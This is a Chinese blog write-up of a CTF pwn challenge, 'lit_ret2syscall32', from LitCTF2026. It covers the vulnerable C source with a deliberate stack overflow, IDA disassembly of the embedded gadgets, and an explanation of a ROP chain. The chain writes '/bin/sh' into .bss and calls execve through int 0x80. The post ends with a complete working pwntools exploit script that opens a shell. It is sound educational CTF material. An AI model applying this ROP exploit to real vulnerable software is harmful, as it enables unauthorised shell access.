<!DOCTYPE html><html lang="zh-CN" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>欢迎来到这里喵~~σ(´∀｀*)</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>pwn做题记录：【Litctf2026】lit_ret2syscall32</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2026-07-30T16:00:00.000Z" id="date"> 2026-07-31</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2026-08-06T10:22:08.137Z" id="updated"> 2026-08-06</time></div></span></div></div><hr><div id="post-content"><h1 id="pwn做题记录：【Litctf2026】lit-ret2syscall32"><a href="#pwn做题记录：【Litctf2026】lit-ret2syscall32" class="headerlink" title="pwn做题记录：【Litctf2026】lit_ret2syscall32"></a>pwn做题记录：【Litctf2026】lit_ret2syscall32</h1><p><strong>题目连接：<a target="_blank" rel="noopener" href="https://platform.cyclens.tech/#/challenge/95">https://platform.cyclens.tech/#/challenge/95</a></strong></p>
<p>下载题目附件，其中有一个二进制文件和一个源文件</p>
<p class='item-img' data-src='/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_1.png'><img src="/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_1.png" alt="image"></p>
<p>进入kali，使用checkesc查看，发现是一个32位的文件，只开了NX保护</p>
<p class='item-img' data-src='/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_2.png'><img src="/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_2.png" alt="image"></p>
<p>main.c中的内容如下（看的不是很懂（¯﹃¯），大概意思就是放了一堆gadget，然后vuln里面有一个栈溢出，偏移是0x48，在ida中分析一下就能看出来）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line">char data_buf[0x100];  // Writable buffer in data section</span><br><span class="line"></span><br><span class="line">// Embed ROP gadgets so they exist in the binary regardless of libc version</span><br><span class="line">__attribute__((naked, noinline)) void gadget_pop_eax(void) &#123;</span><br><span class="line">    __asm__ __volatile__(&quot;pop %eax\nret\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line">__attribute__((naked, noinline)) void gadget_pop_ebx(void) &#123;</span><br><span class="line">    __asm__ __volatile__(&quot;pop %ebx\nret\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line">__attribute__((naked, noinline)) void gadget_pop_ecx_ebx(void) &#123;</span><br><span class="line">    __asm__ __volatile__(&quot;pop %ecx\npop %ebx\nret\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line">__attribute__((naked, noinline)) void gadget_pop_edx(void) &#123;</span><br><span class="line">    __asm__ __volatile__(&quot;pop %edx\nret\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line">__attribute__((naked, noinline)) void gadget_mov_edx_eax(void) &#123;</span><br><span class="line">    __asm__ __volatile__(&quot;mov %eax, (%edx)\nret\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line">__attribute__((naked, noinline)) void gadget_int_0x80(void) &#123;</span><br><span class="line">    __asm__ __volatile__(&quot;int $0x80\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void init() &#123;</span><br><span class="line">    setvbuf(stdin, NULL, _IONBF, 0);</span><br><span class="line">    setvbuf(stdout, NULL, _IONBF, 0);</span><br><span class="line">    setvbuf(stderr, NULL, _IONBF, 0);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void vuln() &#123;</span><br><span class="line">    char buf[64];</span><br><span class="line">    printf(&quot;Welcome to the 32-bit Time Machine!\n&quot;);</span><br><span class="line">    printf(&quot;No system(), no /bin/sh... but int 0x80 still works.\n&quot;);</span><br><span class="line">    printf(&quot;Input: &quot;);</span><br><span class="line">    read(0, buf, 0x200);  // Stack overflow</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">    init();</span><br><span class="line">    // Prevent gadget functions from being optimized away</span><br><span class="line">    volatile void (*fp1)(void) = gadget_pop_eax;</span><br><span class="line">    volatile void (*fp2)(void) = gadget_pop_ebx;</span><br><span class="line">    volatile void (*fp3)(void) = gadget_pop_ecx_ebx;</span><br><span class="line">    volatile void (*fp4)(void) = gadget_pop_edx;</span><br><span class="line">    volatile void (*fp5)(void) = gadget_mov_edx_eax;</span><br><span class="line">    volatile void (*fp6)(void) = gadget_int_0x80;</span><br><span class="line">    if (strlen(&quot;always_true&quot;) == 0) &#123;</span><br><span class="line">        fp1(); fp2(); fp3(); fp4(); fp5(); fp6();</span><br><span class="line">    &#125;</span><br><span class="line">    vuln();</span><br><span class="line">    printf(&quot;Goodbye!\n&quot;);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>直接用ida分析吧。题目中给了一些gadget<br><em>gadget_pop_eax:</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; void gadget_pop_eax()</span><br><span class="line">public gadget_pop_eax</span><br><span class="line">gadget_pop_eax proc near</span><br><span class="line">; __unwind &#123;</span><br><span class="line">pop     eax</span><br><span class="line">retn</span><br><span class="line">gadget_pop_eax endp ; sp-analysis failed</span><br></pre></td></tr></table></figure>
<p><em>gadget_pop_ebx</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; void gadget_pop_ebx()</span><br><span class="line">public gadget_pop_ebx</span><br><span class="line">gadget_pop_ebx proc near</span><br><span class="line">; __unwind &#123;</span><br><span class="line">pop     ebx</span><br><span class="line">retn</span><br><span class="line">gadget_pop_ebx endp ; sp-analysis failed</span><br></pre></td></tr></table></figure>
<p><em>gadget_pop_ecx_ebx:</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">; void gadget_pop_ecx_ebx()</span><br><span class="line">public gadget_pop_ecx_ebx</span><br><span class="line">gadget_pop_ecx_ebx proc near</span><br><span class="line">; __unwind &#123;</span><br><span class="line">pop     ecx</span><br><span class="line">pop     ebx</span><br><span class="line">retn</span><br><span class="line">gadget_pop_ecx_ebx endp ; sp-analysis failed</span><br></pre></td></tr></table></figure>
<p><em>gadget_pop_edx:</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; void gadget_pop_edx()</span><br><span class="line">public gadget_pop_edx</span><br><span class="line">gadget_pop_edx proc near</span><br><span class="line">; __unwind &#123;</span><br><span class="line">pop     edx</span><br><span class="line">retn</span><br><span class="line">gadget_pop_edx endp ; sp-analysis failed</span><br></pre></td></tr></table></figure>
<p><em>gadget_mov_edx_eax:</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; void gadget_mov_edx_eax()</span><br><span class="line">public gadget_mov_edx_eax</span><br><span class="line">gadget_mov_edx_eax proc near</span><br><span class="line">; __unwind &#123;</span><br><span class="line">mov     [edx], eax</span><br><span class="line">retn</span><br><span class="line">gadget_mov_edx_eax endp</span><br></pre></td></tr></table></figure>
<p>然后还有int 0x80的gadget，<strong>但是这里的int 0x80后面没有ret，而是nop    ud2</strong>，这里和普通的<strong>int 0x80;ret</strong>不太一样，意味着int 0x80之后没有跳转<br><em>gadget_int_0x80:</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">; Attributes: noreturn</span><br><span class="line"></span><br><span class="line">; void __noreturn gadget_int_0x80()</span><br><span class="line">public gadget_int_0x80</span><br><span class="line">gadget_int_0x80 proc near</span><br><span class="line">; __unwind &#123;</span><br><span class="line">int     80h             ; LINUX -</span><br><span class="line">nop</span><br><span class="line">ud2</span><br><span class="line">; &#125; // starts at 80491C1</span><br><span class="line">gadget_int_0x80 endp</span><br></pre></td></tr></table></figure>
<p>ud2指令用于<strong>触发无效操作码异常</strong>，也就是说如果程序运行到这里，到了ud2指令时会直接抛出异常退出，那么int 0x80指令就只能使用一次，常规的先使用调用read写入“&#x2F;bin&#x2F;sh\x00”字符串然后再调用execve(“&#x2F;bin&#x2F;sh”,null,null)的方法在这里不能使用<br>直接在程序中找“&#x2F;bin&#x2F;sh\x00”字符串呢，程序中确实有，但是sh后面没有\x00，调用字符串时没有截断</p>
<p class='item-img' data-src='/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_3.png'><img src="/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_3.png" alt="image"></p>
<p>直接利用ROPgadget找到的“&#x2F;bin&#x2F;sh”字符串地址调用execve，使用gdb查看寄存器，发现ebx寄存器中不只是“&#x2F;bin&#x2F;sh”，连带着后面的字符串一起被放在了这里，程序运行到ud2，调用失败了</p>
<p class='item-img' data-src='/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_4.png'><img src="/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_4.png" alt="image"></p>
<p>那有什么解决方法呢，在题目的gadget中，除了一堆pop寄存器的gadget，还有一个<strong>gadget_mov_edx_eax</strong>的gadget。这个gadget中的两行代码值得注意一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mov     [edx], eax</span><br><span class="line">retn</span><br></pre></td></tr></table></figure>
<p>这段代码意思是将eax的值放到edx所指向的地址，这里要注意寄存器的值和寄存器所指地址的区别，[edx]表示edx所指的地址，如果edx的值是0x00114514，eax的值是0x01919810,执行完这两条语句后，0x01919810被写入地址为0x00114514的位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">eax=0x01919810</span><br><span class="line">edx=0x00114514</span><br><span class="line">地址      内容（小端）</span><br><span class="line">0x00114514: 0x10</span><br><span class="line">0x00114515: 0x98</span><br><span class="line">0x00114516: 0x91</span><br><span class="line">0x00114517: 0x01</span><br></pre></td></tr></table></figure>
<p>利用这一段，结合前面pop edx的gadget，可以将eax的值写道我们pop进edx的任意地址，这思路就来了，我们让eax的值是“&#x2F;bin&#x2F;sh\x00”，在bss段中找一个位置pop给edx，然后mov [edx],eax，将“&#x2F;bin&#x2F;sh\x00”写入到bss段中，然后再ret2syscall调用execve，这样就不用执行两次int 0x80先写入“&#x2F;bin&#x2F;sh\x00”字符串了<br>这里还要注意，eax是32位的寄存器，长度只有4字节，也就是说一次只能向内存中写入4字节数据，而完整的“&#x2F;bin&#x2F;sh\x00”字符串有8字节，<strong>也就是说需要两次利用gadget_mov_edx_eax向bss中写入数据</strong>，这里要注意第二次次写入的<br>地址要加4，小端序需要倒着写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">payload = b&#x27;a&#x27; * offest</span><br><span class="line">payload += p32(pop_eax_ret) + p32(0x6e69622f)   #将“nib/”pop到eax</span><br><span class="line">payload += p32(pop_edx_ret) + p32(bss)          #将bss弹到edx</span><br><span class="line">payload += p32(mov_edx_eax)                     #调用mov [edx],eax，写入“nib/”</span><br><span class="line">payload += p32(pop_eax_ret) + p32(0x0068732f)   #弹入“\x00hs/”</span><br><span class="line">payload += p32(pop_edx_ret) + p32(bss + 4)      </span><br><span class="line">payload += p32(mov_edx_eax)                     #向bss+4的地方写入</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>后面再加上系统调用execve的payload，将0xb弹入eax，将0弹入ecx，刚刚写入字符串的bss地址弹入ebx，0弹入edx，调用execve(“&#x2F;bin&#x2F;sh”,null,null)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload += p32(pop_eax_ret) + p32(0xb)           </span><br><span class="line">payload += p32(pop_ecx_ebx_ret) + p32(0) + p32(bss)</span><br><span class="line">payload += p32(pop_edx_ret) + p32(0)</span><br><span class="line">payload += p32(int_80)</span><br></pre></td></tr></table></figure>
<p>运行脚本发送数据即可拿到本地shell，远程也一样适用<br class='item-img' data-src='/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_5.png'><img src="/images/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9ALitctf2026litret2syscall32/img_5.png" alt="image"></p>
<h3 id="完整脚本代码"><a href="#完整脚本代码" class="headerlink" title="完整脚本代码"></a>完整脚本代码</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.clear(arch=&#x27;i386&#x27;, os=&#x27;linux&#x27;)</span><br><span class="line">io = process(&#x27;ret2syscall32&#x27;)</span><br><span class="line">#gdb.attach(io)</span><br><span class="line">#io = remote(&#x27;challenge.cyclens.tech&#x27;, 30643)</span><br><span class="line"></span><br><span class="line">offest = 0x48 + 0x4</span><br><span class="line">pop_eax_ret = 0x080491a6</span><br><span class="line">pop_ecx_ebx_ret = 0x080491b0</span><br><span class="line">pop_edx_ret = 0x080491b6</span><br><span class="line">mov_edx_eax = 0x080491bb</span><br><span class="line">int_80 = 0x080491c1</span><br><span class="line">bss = 0x0804b360 + 0x50</span><br><span class="line"></span><br><span class="line">payload = b&#x27;a&#x27; * offest</span><br><span class="line">payload += p32(pop_eax_ret) + p32(0x6e69622f)  </span><br><span class="line">payload += p32(pop_edx_ret) + p32(bss)</span><br><span class="line">payload += p32(mov_edx_eax)                     </span><br><span class="line">payload += p32(pop_eax_ret) + p32(0x0068732f)  </span><br><span class="line">payload += p32(pop_edx_ret) + p32(bss + 4)</span><br><span class="line">payload += p32(mov_edx_eax)                      </span><br><span class="line">payload += p32(pop_eax_ret) + p32(0xb)          </span><br><span class="line">payload += p32(pop_ecx_ebx_ret) + p32(0) + p32(bss)</span><br><span class="line">payload += p32(pop_edx_ret) + p32(0)</span><br><span class="line">payload += p32(int_80)</span><br><span class="line"></span><br><span class="line">io.recvuntil(b&#x27;Input: &#x27;)</span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-start"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2026/07/31/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9A%5BLitCTF2026%5D%20lit_ropchain/">← 下一篇 pwn做题记录：[LitCTF2026] lit_ropchain</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">GalaNarr</a></h1><div id="description"><p>一个专注于彻底摆烂的新手博客喵~~</p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95%EF%BC%9A%E3%80%90Litctf2026%E3%80%91lit-ret2syscall32"><span class="toc-number">1.</span> <span class="toc-text">pwn做题记录：【Litctf2026】lit_ret2syscall32</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%8C%E6%95%B4%E8%84%9A%E6%9C%AC%E4%BB%A3%E7%A0%81"><span class="toc-number">1.0.1.</span> <span class="toc-text">完整脚本代码</span></a></li></ol></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>